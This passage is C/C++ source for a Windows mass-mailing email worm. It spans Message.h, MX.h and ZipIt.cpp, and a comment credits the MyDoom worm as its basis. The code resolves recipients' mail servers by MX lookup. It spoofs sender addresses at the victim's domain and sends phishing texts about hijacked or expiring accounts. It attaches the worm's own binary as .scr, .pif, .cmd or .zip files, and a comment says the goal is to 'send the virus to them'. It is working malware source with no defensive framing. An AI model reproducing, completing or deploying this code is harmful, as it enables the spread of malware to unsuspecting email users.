{
if (iStatus!=SOCKET_ERROR && iStatus!=0)
{
return TRUE;
}
return FALSE;
}

char mail_1[64] = "", helokitty[64] = ""; //lol, meow! :=)

char bigbuff[4096],szLine[255],MessageBuffer[255];

//send the message buffer to the server we are connected to

void sendmsgbuff()
{
if(!chk(send(hServer,MessageBuffer,strlen(MessageBuffer),0)))
ErrorLevel = ERROR_LEVEL_SEND;

}
void recvbuff()
{
if(!chk(recv(hServer,bigbuff,sizeof(bigbuff),0)))
ErrorLevel = ERROR_LEVEL_RECEIVE;
if (bigbuff[0]=='4' || bigbuff[0]=='5') ErrorLevel = ERROR_LEVEL_RECEIVE;

//gets the date from the local system then implements that as the date of when email was sent
void getdate(FILETIME *time, char *buf)
{
SYSTEMTIME t;
TIME_ZONE_INFORMATION tmz_info;
DWORD daylight_flag; int utc_offs, utc_offs_u;
LPSTR weekdays[7] = { "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat" };
LPSTR months[12] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep",
"Oct", "Nov", "Dec" };

if (time == NULL) {
GetLocalTime(&t);
} else {
FILETIME lft;
FileTimeToLocalFileTime(time, &lft);
FileTimeToSystemTime(&lft, &t);
}

tmz_info.Bias = 0;
daylight_flag = GetTimeZoneInformation(&tmz_info);

utc_offs = tmz_info.Bias;
if (daylight_flag == TIME_ZONE_ID_DAYLIGHT) utc_offs += tmz_info.DaylightBias;
Message.h

utc_offs = -utc_offs;
utc_offs_u = (utc_offs >= 0) ? utc_offs : -utc_offs;

if (t.wDayOfWeek > 6) t.wDayOfWeek = 6;

if (t.wMonth == 0) t.wMonth = 1;
if (t.wMonth > 12) t.wMonth = 12;
static const char szDns[] = "%s %u %s %u.2u. %s";
wsprintf(buf,
"%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",
weekdays[t.wDayOfWeek], t.wDay,
months[t.wMonth-1], t.wYear,
t.wHour, t.wMinute, t.wSecond,
(utc_offs >= 0) ? "+" : "-",
utc_offs_u / 60, utc_offs_u % 60
);
}

BOOL sendmail(LPSTR strTo)

{

char syste[100];
GetSystemDirectory(syste,sizeof(syste));
srand(GetTickCount()); //Seeds random number generator
#define CRLF "\r\n"

char* szBuf2 = new char[76];

/////////////////////////////////////////////////
static const char *gen_names[] = {
"server","administration", "managment", "service", "userhelp"
};

#define gen_names_cnt (sizeof(gen_names) / sizeof(gen_names[0]))

#define dmain 80
char domain[dmain], *p;
for (p=strTo; *p && *p != '@'; p++);
if (*p++ != '@') return 0;
lstrcpyn(domain, p, dmain-1);
char froms[255];
int i;
i = rand() % gen_names_cnt;
lstrcpy(froms, gen_names[i]);
lstrcat(froms, "@");
lstrcat(froms, domain);

////////////////////////////////////////////////
char subject[200];
static const char *subjects[] = {
"Urgent Update!", "Server Error", "User Info", "URGENT PLEASE READ!", "Detailed
Information",
"User Information", "Email Account Information"
};
#define subjects_names (sizeof(subjects) / sizeof(subjects[0]))
int j;
j = rand() % subjects_names;
lstrcpy(subject, subjects[j]);
Message.h

////////////////////////////////////////////////
char attachment[200];
static const char *attachments[] = {
"Update","Details","Information", "Gift", "Word Document", "Account Information"
};

#define attachments_names (sizeof(attachments) / sizeof(attachments[0]))

int k;
k = rand() % attachments_names;
lstrcpy(attachment, attachments[k]);
///////////////////////////////////////////////

char message[200];
static const char *messages[] = {
"There is urgent information in the attachment regarding your Email account",
"Your Email account information has been removed from the system due to inactivity. To
renew your account information refer to the attachment",
"We regret to inform you that your account has been hijacked and used for illegal
purposes. The attachment has more information about what has happened.",
"Our Email system has received reports of your account flooding email servers. There
is more information on this matter in the attachment",
"Due to recent internet attacks, your Email account security is being upgraded. The
attachment contains more details",
"Our server is experiencing some latency in our email service. The attachment contains
details on how your account will be affected."
};

#define message_names (sizeof(messages) / sizeof(messages[0]))

int l;
l = rand() % message_names;
lstrcpy(message, messages[l]);

////////////////////////////////////////////////
char extension[200];
static const char *extensions[] = {
".zip",".scr",".pif", ".cmd"
};

#define extensions_names (sizeof(extensions) / sizeof(extensions[0]))

int m;
m = rand() % extensions_names;
lstrcpy(extension, extensions[m]);
lstrcat(attachment,extension);
//printf(attachment); debugging purposes
////////////////////////////////////////////////

///////////////////////////////////////////////

if(strstr(attachment,".zip"))
{

strcat(syste,"\\base64zip.sys");
//printf(syste); debug
}
Message.h

else
{

strcat(syste,"\\base64exe.sys");
//printf(syste); even more debuggin
}

//////////////////////////////////////////////

/***************************************
* Standard Email bullshit sent to the server
* I had to read some tutorials on this
* Main part of the massmailing :P
***************************************/

//everytime you see sprintf(MessageBuffer,blah); it is just

// printing what ever arguements to the buffer then sends them to
// the recipient's server

if (strlen(helokitty)>0) sprintf(MessageBuffer,"HELO <%s>%s",helokitty,CRLF);

else sprintf(MessageBuffer,"HELO %s%s",domain,CRLF);
sendmsgbuff(); recvbuff();

if (strlen(mail_1)>0) sprintf(MessageBuffer,"MAIL FROM: <%s>%s",mail_1,CRLF);

else sprintf(MessageBuffer,"MAIL FROM: <%s>%s",froms,CRLF);
sendmsgbuff(); recvbuff();

sprintf(MessageBuffer,"RCPT TO: <%s>%s",strTo,CRLF);

sendmsgbuff(); recvbuff();
sprintf(MessageBuffer,"DATA%s",CRLF);
sendmsgbuff(); recvbuff();
char bufffer[MAX_PATH];
getdate(NULL,bufffer);
sprintf(MessageBuffer,"To: %s%s",strTo,CRLF); sendmsgbuff();
sprintf(MessageBuffer,"Subject: %s%s",subject,CRLF); sendmsgbuff();
sprintf(MessageBuffer,"Date: %s%s",bufffer,CRLF); sendmsgbuff();
sprintf(MessageBuffer,"From: %s%s",froms,CRLF); sendmsgbuff();
sprintf(MessageBuffer,"MIME-Version: 1.0%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"Content-Type: multipart/mixed;" ,CRLF); sendmsgbuff();
sprintf(MessageBuffer,"boundary=\"--zzzxxxzzzxxx\"%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"X-Priotity: 3%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"X-MSMail-Priority: Normal%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"%sThis is a multipart MIME-encoded message%s%s",CRLF,CRLF,CRLF);
sendmsgbuff();
sprintf(MessageBuffer,"----zzzxxxzzzxxx%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"Content-Type: text/html; charset=\"us-ascii\"%s",CRLF);
sendmsgbuff();
sprintf(MessageBuffer,"Content-Transfer-Encoding: quoted-printable%s%s",CRLF,CRLF);
sendmsgbuff();
sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"%s%s",message,CRLF); sendmsgbuff();
sprintf(MessageBuffer,"----zzzxxxzzzxxx%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"Content-Type: application/octet-stream; name=\"%s\"%s",attachment,
CRLF); sendmsgbuff();
sprintf(MessageBuffer,"Content-Transfer-Encoding: base64%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"Content-Disposition: attachment; filename=\"%s\"%s",attachment,
CRLF); sendmsgbuff();
sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
FILE* file1;
char szBuf[MAX_PATH];
Message.h

char* strFile1 = new char[MAX_PATH];

file1 = fopen(syste,"rb");
if(file1==NULL)return 0;
while(!feof(file1))
{
fscanf(file1,"%s\n",szBuf);
sprintf(MessageBuffer,"%s%s",szBuf,CRLF);
sendmsgbuff();
}

sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"----zzzxxxzzzxxx--%s",CRLF); sendmsgbuff();
sprintf(MessageBuffer,"%s.%s",CRLF,CRLF);
sendmsgbuff(); recvbuff();
sprintf(MessageBuffer,"QUIT%s",CRLF);
sendmsgbuff(); recvbuff();
closesocket(hServer);
return TRUE;
}
MX.h

/****************************************************
* Originally written in December 03
*
* Purpose:
* Manually queries the users DNS server
* and looksup the MX record of the recipient's
* address. Then, mailer.cpp takes the MX server
* address and looks up the IP address of the server
* and uses sendmail function to send the virus to them
*
*
*****************************************************/

#define ERROR_LEVEL_NONE 0
#define ERROR_LEVEL_SEND 1
#define ERROR_LEVEL_RECEIVE 2

SOCKET hServer;
WSADATA wsData;
int ErrorLevel = ERROR_LEVEL_NONE;

/* Structures to hold DNS information */

typedef struct DNS_HEAD {

WORD wIdentification;
WORD wFlags;
WORD wNumberOfQuestions;
WORD wNumberOfAnswers;
WORD wNumberOfAuthority;
WORD wNumberOfAdditional;
} * PDNSH, DNSH;

typedef struct DNS_QUESTION {

char sQuestion[256];
WORD wType;
WORD wClass;
} * PDNSQ, DNSQ;

typedef struct DNS_RFIXED {

WORD wType;
WORD wClass;
DWORD dwTTL;
WORD wDataLength;
} * PDNSR, DNSR;

typedef struct DNS_RESOURCE {

char sName[256];
DNSR dnsFixed;
WORD wPreferenceMX;
char sHostname[256];

} * PDNSRR, DNSRR;

typedef struct MX_REPLY {

DWORD dwNumReplies;
PDNSRR mxReplies;

} MX, * PMX, FAR * LPMX;

MX.h

#define DNS_HEADER_LEN 12
#define DNS_QUESTION_LEN 260
#define DNS_RFIXED_LEN 10
#define DNS_RESOURCE_LEN 522
#define DNS_MAX_QUESTION 275

WORD MxGetID(WORD wAdd) {

static WORD wID = LOWORD(GetCurrentThreadId());

return (wID + wAdd);
}
// Makes the MX record query which is sent to the server
char* MxFormQuery(LPCSTR szQuery, WORD* pwSize) {

WORD wHead[]= {htons(MxGetID(0)),0,0x0100,0,0,0};

static char cBuffer[DNS_MAX_QUESTION];

memset((void*) cBuffer, 0, DNS_MAX_QUESTION);

memcpy((void*) cBuffer, (void*) wHead, 12);

int i = 0, p = 0;
int s = strlen(szQuery)+1;
int max = 12 + s + 5;

if (pwSize)
*pwSize = (WORD) max;
//begin formulating server query

for(i=0;i<=s;i++) {
if (i==s) {
cBuffer[p+12] = i-p-1;
DWORD dwX = 0x01000F00;
memcpy((void*) &cBuffer[12+1+i], (void*) &dwX, 4);
} else if (szQuery[i]=='.') {
cBuffer[p+12] = i-p;
p = i+1;
} else {
cBuffer[12+1+i] = szQuery[i];
}
}

return cBuffer;
}

//read in dns name and MX server

int MxReadName(const char* szDNS, int iOffset, char* szBuffer) {

if (!szDNS) return 0;

WORD wOctPtr = 0;
signed int i = 0;
BYTE c = NULL;

for (i=iOffset;szDNS[i];i++) {
int j = i - iOffset - 1;

if (!c)
{
c = szDNS[i];
if (j!=(-1)) szBuffer[j] = '.';
MX.h

if (c & 0xC0) {

c = c & 0x3F;
wOctPtr = c;
wOctPtr <<= 8;
c = szDNS[++i];
wOctPtr |= c;

return MxReadName(szDNS,wOctPtr,&szBuffer[j+1])?(i+1):0;
}

} else {
szBuffer[j] = szDNS[i];
c--;
}
}

szBuffer[i++] = 0;
return i;
}

int MxGetQuestion(const char* szDNS, PDNSQ pQuestion) {

DNSQ dns = {0};

int iOff = DNS_HEADER_LEN;

if (int i = MxReadName(szDNS,iOff,dns.sQuestion)) {
dns.wType = htons(*((WORD*) &szDNS[i]));
dns.wClass = htons(*((WORD*) &szDNS[i+2]));
if (pQuestion) memcpy((void*) pQuestion,
(void*) &dns, DNS_QUESTION_LEN);
return (i+4);
} else {
return 0;
}
}

int MxGetRes(const char* szDNS, int iOff, PDNSRR pDns) {

DNSRR dns = {0};

signed int i = 0;
signed int iRet = 0;
if (i = MxReadName(szDNS,iOff,dns.sName))
{
memcpy((void*) &dns.dnsFixed, (void*) &szDNS[i],
DNS_RFIXED_LEN);

dns.dnsFixed.dwTTL = htonl(dns.dnsFixed.dwTTL);
dns.dnsFixed.wClass = htons(dns.dnsFixed.wClass);
dns.dnsFixed.wDataLength = htons(dns.dnsFixed.wDataLength);
dns.dnsFixed.wType = htons(dns.dnsFixed.wType);

i += DNS_RFIXED_LEN;
iRet=i+dns.dnsFixed.wDataLength;
switch(dns.dnsFixed.wType) {

case 2:
iRet = MxReadName(szDNS, i, dns.sHostname);
break;

case 15:
MX.h

dns.wPreferenceMX = * ((WORD*) &szDNS[i]);

dns.wPreferenceMX = htons(dns.wPreferenceMX);
iRet = MxReadName(szDNS, i+2, dns.sHostname);
break;

default:

break;
}

if (pDns && i) memcpy((void*) pDns, (void*) &dns,

DNS_RESOURCE_LEN);

}
return iRet;
}

PDNSRR MxGetResources(const char* szDNS, int num) {

PDNSRR pDnsRR = NULL;

int iOff = MxGetQuestion(szDNS,NULL);

if (!szDNS) {
return NULL;
} else if (!(pDnsRR = new DNSRR[num])) {
return NULL;
}

PDNSRR pPoint = pDnsRR;

for (int i = 0; i < num; i++) {

if (!(iOff = MxGetRes(szDNS,iOff,pPoint))) {
delete[] pDnsRR;
return NULL;
}
pPoint = &pDnsRR[i+1];
}
return pDnsRR;
}

DWORD GetIPAddr(LPCSTR strHost) {

HOSTENT* hp = gethostbyname(strHost);
return hp?(((PIN_ADDR)hp->h_addr)->S_un.S_addr):0;
}
// checks if the address is really a valid ip address
bool IsIPAddr(LPCSTR sHost) {
if (!sHost) return false;
if (strlen(sHost)>15) return false;

for (int ptr=0;ptr<=3;sHost++) {

if (!*sHost) return true;
if (*sHost=='.') { ptr++; continue;}
if (!isdigit(*sHost)) return false;
}

return false;
}
//is it a digit? 0-9
bool IsDigit(LPCSTR sVal) {
do { if (!isdigit(*sVal)) return false; }
MX.h

while (*++sVal);
return true;
}

//pauses WSA to get response

bool WSAWait(HANDLE hEvent, int iTimeout) {

int iRet = WSAGetLastError();

if (!iRet) {
ResetEvent(hEvent);
return true;
}

else if (iRet==WSAEWOULDBLOCK) {
if (WaitForSingleObject(hEvent,iTimeout)) {
return false;
} else if (!ResetEvent(hEvent)) {
return false;
} else {
return true;
}
} else {
return false;
}
}
//Recursively searches the server for the MX record
MX MxRecursiveGet(LPCSTR sRequest, DWORD dwServerIP, int iTimeout) {

static DWORD ips[200];

static DWORD ipc;

static WSADATA wsa = {0};

bool bInitiator = false;

MX mxReturn = {0};

bInitiator = true;
ipc = 0;

if (!bInitiator) {

for (DWORD i = 0; i < ipc; i++) {

if (dwServerIP == ips[i])
return mxReturn;
}

if (ipc >= 199) return mxReturn;

else ips[++ipc] = dwServerIP;

signed int i = 0, jmp = 0;

SOCKADDR_IN sAddr = {0};
SOCKET s = INVALID_SOCKET;
DWORD dwZero = NULL;

DNSH dnsHead = {0};

DNSQ dnsQu = {0};
HANDLE hEvent = NULL;

char *szQuery=NULL, *szReply=NULL;

MX.h

WORD wQuery=0, wReply=0, wQ = 0;

if (!(szQuery = MxFormQuery(sRequest, &wQuery)))

goto end_get;

else wQ = htons(wQuery);

sAddr.sin_addr.S_un.S_addr = dwServerIP;
sAddr.sin_family = AF_INET;
sAddr.sin_port = htons(53);

if ((s = socket(PF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)

goto end_get;

if (!(hEvent = CreateEvent(NULL,TRUE,FALSE,NULL)))
goto end_get;

if (WSAEventSelect(s,hEvent,FD_CONNECT) == SOCKET_ERROR)
goto end_get;

i = connect(s,(PSOCKADDR) &sAddr, sizeof(sAddr)); //lets connect to the server :)

if ((i==SOCKET_ERROR)&&WSAGetLastError()!=WSAEWOULDBLOCK)
goto end_get;

if (WaitForSingleObject(hEvent,iTimeout))
goto end_get;

if ((WSAEventSelect(s,hEvent,NULL)==SOCKET_ERROR) ||
(ioctlsocket(s,FIONBIO,&dwZero)==SOCKET_ERROR ))
{
goto end_get;
}

if (!ResetEvent(hEvent)) {
goto end_get;
}

if (send(s,(LPCSTR) &wQ, 2, 0) != 2)
goto end_get;
if (send(s,(LPCSTR) szQuery, wQuery, 0) != wQuery)
goto end_get;

if (WSAEventSelect(s,hEvent,FD_READ) == SOCKET_ERROR)
goto end_get;

if (recv(s,(char*)&wReply,2,0)!=2) {
if (WSAWait(hEvent,iTimeout)) {
if (recv(s,(char*)&wReply,2,0)!=2) {
goto end_get;
} } }

wReply = htons(wReply);

if (!(szReply=(char*)malloc(wReply)))
goto end_get;

if (recv(s,szReply,wReply,0)!=wReply) {
MX.h

if (WSAWait(hEvent,iTimeout)) {
if (recv(s,szReply,wReply,0)!=wReply) {
goto end_get;
} } }

CloseHandle(hEvent);
closesocket(s);
s = INVALID_SOCKET;

for (i = 0; i < sizeof(dnsHead); i+=2) {

char cTemp = szReply[i];
szReply[i] = szReply[i+1];
szReply[i+1] = cTemp;
}

memcpy((void*) &dnsHead, (void*) szReply,

DNS_HEADER_LEN);

if (dnsHead.wIdentification == MxGetID(0)) {

if (dnsHead.wNumberOfAnswers) {

if (mxReturn.mxReplies = MxGetResources(szReply,
dnsHead.wNumberOfAnswers))
{
mxReturn.dwNumReplies = dnsHead.wNumberOfAnswers;
}

goto end_get;
}

else if (dnsHead.wNumberOfAuthority) {

if (PDNSRR dnsRes = MxGetResources(szReply,

dnsHead.wNumberOfAuthority))
{
free(szReply);
szReply = NULL;

for (i=0;(i<dnsHead.wNumberOfAuthority)&&(!mxReturn.mxReplies);i++) {
if ((dnsRes[i].dnsFixed.wType == 2) && // Authority Nameserver
(dnsRes[i].dnsFixed.wClass== 1)) // Internet
{
DWORD dwConnect = GetIPAddr(dnsRes[i].sHostname);
if (dwConnect) mxReturn = MxRecursiveGet(
sRequest,dwConnect,iTimeout);
}
}

delete[] dnsRes; //deallocate memory space

}

}
}

end_get:
if (s != INVALID_SOCKET) closesocket(s);
if (szReply) free(szReply);
return mxReturn;
}
MX.h

//Clears the buffer (in the structure)

void MxClearBuffer(PMX m) {
if (m->mxReplies) delete[] m->mxReplies;
memset((void*) m, 0, sizeof(MX));
}
ZipIt.cpp

/********************************************
* Based on I-WORM.MYDOOM.A Imported my own
* algorithm to create a 32-bit crc table
********************************************/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#pragma pack(push, 1)

/* The structures for creating the zip file */

struct zip_header_t {
DWORD signature;
WORD ver_needed;
WORD flags;
WORD method;
WORD lastmod_time;
WORD lastmod_date;
DWORD crc;
DWORD compressed_size;
DWORD uncompressed_size;
WORD filename_length;
WORD extra_length;
};

struct zip_eod_t {
DWORD signature;
WORD disk_no;
WORD disk_dirst;
WORD disk_dir_entries;
WORD dir_entries;
DWORD dir_size;
DWORD dir_offs;
WORD comment_len;
};

struct zip_dir_t {
DWORD signature;
WORD made_by;
WORD ver_needed;
WORD flags;
WORD method;
WORD lastmod_time;
WORD lastmod_date;
DWORD crc;
DWORD compressed_size;
DWORD uncompressed_size;
WORD filename_length;
WORD extra_length;
WORD comment_length;
WORD disk_no;
WORD internal_attr;
DWORD external_attr;
DWORD local_offs;
};
#pragma pack(pop)

unsigned long crc32(unsigned long crc, const unsigned char *buf, int len)
ZipIt.cpp

{
#define CRC32_POLYNOMIAL 0xEDB88320 //the standard PKZIP polynomial
unsigned long crc_table[256];
unsigned long crc32;
int i, j;

for (i = 0; i < 256; i++) { //this is where my algorithm starts

crc32 = i;
for (j = 8; j > 0; j--) {
if (crc32 & 1)
crc32 = (crc32 >> 1) ^ CRC32_POLYNOMIAL;
else
crc32 >>= 1;
}
crc_table[i] = crc32;
}

/* Mark Adler stuff taken from zlib.c */

if (buf == NULL) return 0L;

#define CRC32(c, b) (crc_table[((int)(c) ^ (b)) & 0xff] ^ ((c) >> 8))
#define DO1(buf) crc = CRC32(crc, *buf++)
#define DO2(buf) DO1(buf); DO1(buf)
#define DO4(buf) DO2(buf); DO2(buf)
#define DO8(buf) DO4(buf); DO4(buf)
crc = crc ^ 0xffffffffL;
#ifndef NO_UNROLLED_LOOPS
while (len >= 8) {
DO8(buf);
len -= 8;
}
#endif
if (len) do {
DO1(buf);
} while (--len);
return crc ^ 0xffffffffL;
}
//from here on down is mydoom bullshit
static void zip_putcurtime(WORD *f_time, WORD *f_date)
{
SYSTEMTIME systime;

GetSystemTime(&systime);
if ((systime.wYear < 1999) || (systime.wYear > 2010))
systime.wYear = 2004;
if (systime.wMonth < 1 || systime.wMonth > 12) systime.wMonth = 1;
if (systime.wDay < 1 || systime.wDay > 31) systime.wDay = 10;

*f_date =
((systime.wYear-1980) << 9) |
(systime.wMonth << 5) |
systime.wDay;

*f_time =
(systime.wHour << 11) |
(systime.wMinute << 5) |
(systime.wSecond / 2);
}

static unsigned long zip_calc_crc32(HANDLE hFileIn)

{
unsigned long reg, i;
ZipIt.cpp

unsigned char buf[1024];

SetFilePointer(hFileIn, 0, NULL, FILE_BEGIN);
for (reg=0;;) {
i = 0;
if (ReadFile(hFileIn, buf, sizeof(buf), &i, NULL) == 0) break;
if (i == 0) break;
reg = crc32(reg, buf, i);
}
SetFilePointer(hFileIn, 0, NULL, FILE_BEGIN);
return reg;
}

int zip_store(char *in, char *out, char *store_as)

{
HANDLE hFileIn, hFileOut;
struct zip_header_t hdr1;
struct zip_eod_t eod1;
struct zip_dir_t dir1;
char buf[1024];
unsigned long i, j, offs;

hFileIn = CreateFile(in, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE,

NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFileIn == INVALID_HANDLE_VALUE || hFileIn == NULL)
return 1;
hFileOut = CreateFile(out, GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFileOut == INVALID_HANDLE_VALUE || hFileOut == NULL) {
CloseHandle(hFileIn);
return 2;
}

memset(&hdr1, '\0', sizeof(hdr1));

memset(&dir1, '\0', sizeof(dir1));
memset(&eod1, '\0', sizeof(eod1));
offs = 0;

hdr1.signature = 0x04034b50;
dir1.ver_needed = hdr1.ver_needed = 10;
dir1.flags = hdr1.flags = 0;
dir1.method = hdr1.method = 0;
zip_putcurtime(&hdr1.lastmod_time, &hdr1.lastmod_date);
dir1.lastmod_time = hdr1.lastmod_time;
dir1.lastmod_date = hdr1.lastmod_date;
hdr1.crc = zip_calc_crc32(hFileIn);
dir1.crc = hdr1.crc;

hdr1.compressed_size = GetFileSize(hFileIn, NULL);

dir1.compressed_size = hdr1.compressed_size;
hdr1.uncompressed_size = GetFileSize(hFileIn, NULL);
dir1.uncompressed_size = hdr1.uncompressed_size;
hdr1.filename_length = lstrlen(store_as);
dir1.filename_length = hdr1.filename_length;
dir1.extra_length = hdr1.extra_length = 0;

dir1.local_offs = offs;

WriteFile(hFileOut, &hdr1, sizeof(hdr1), &i, NULL);

offs += sizeof(hdr1);
WriteFile(hFileOut, store_as, lstrlen(store_as), &i, NULL);
offs += lstrlen(store_as);
SetFilePointer(hFileIn, 0, NULL, FILE_BEGIN);
ZipIt.cpp

for (;;) {
i = 0;
if (ReadFile(hFileIn, buf, sizeof(buf), &i, NULL) == 0) break;
if (i == 0) break;
WriteFile(hFileOut, buf, i, &j, NULL);
offs += i;
}

eod1.dir_offs = offs;

dir1.signature = 0x02014b50;
dir1.made_by = 20;
dir1.internal_attr = 0;
dir1.external_attr = 0x20;
WriteFile(hFileOut, &dir1, sizeof(dir1), &i, NULL);
offs += sizeof(dir1);
WriteFile(hFileOut, store_as, lstrlen(store_as), &i, NULL);
offs += lstrlen(store_as);

eod1.signature = 0x06054b50;
eod1.disk_no = 0;
eod1.disk_dirst = 0;
eod1.disk_dir_entries = 1;
eod1.dir_entries = eod1.disk_dir_entries;
eod1.dir_size = offs - eod1.dir_offs;
eod1.comment_len = 0;
WriteFile(hFileOut, &eod1, sizeof(eod1), &i, NULL);

CloseHandle(hFileOut);
CloseHandle(hFileIn);
return 0;
}